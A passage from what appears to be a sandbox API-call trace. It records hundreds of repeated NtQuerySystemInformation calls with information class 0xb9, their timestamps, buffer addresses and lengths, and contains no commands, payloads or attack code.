ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x28, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3c0, Length=0x20, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0272.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0272.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x50, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x50, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x28, ResultLength=0x0) [0272.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x28, ResultLength=0x0) [0272.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3c0, Length=0x20, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc340, Length=0x20, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x28, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x20, ResultLength=0x0) [0272.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x20, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb10, Length=0x20, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb10, Length=0x20, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x20, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x20, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 